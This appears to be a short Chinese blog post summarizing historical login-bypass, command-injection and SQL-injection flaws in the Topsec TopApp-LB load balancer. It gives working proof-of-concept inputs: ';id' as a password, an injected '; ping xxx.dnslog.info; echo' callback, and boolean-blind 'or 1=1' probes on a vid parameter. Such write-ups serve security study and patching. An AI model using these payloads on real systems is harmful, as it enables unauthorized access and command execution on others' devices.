zoukankan      html  css  js  c++  java
  • 天融信TopApp-LB 负载均衡系统漏洞总结(历史漏洞)

    天融信TopApp-LB 负载均衡系统漏洞总结(历史漏洞)

    一、漏洞描述

    1、天融信负载均衡TopApp-LB系统无需密码直接登陆

    2、天融信TopApp-LB负载均衡命令执行漏洞

    3、天融信TopApp-LB 负载均衡系统Sql注入漏洞

    二、漏洞复现

     1、使用poc::用户名随意  密码:;id

     

    2、使用poc:; ping xxx.dnslog.info; echo

    3.1、抓包

     3.2、vid参数加单引号,报错

    3.3、使用or 1=1  or 1=2发现返回界面不一样,证明存在注入点(布尔盲注)

     

  • 相关阅读:
    bug
    UIFont
    OC
    iOS 之 多线程一
    OC 之 const
    我的读书单
    算法之回文数判断
    排序算法 之 一
    isEqual
    xcode 必用插件二
  • 原文地址:https://www.cnblogs.com/yuzly/p/13673760.html
Copyright © 2011-2022 走看看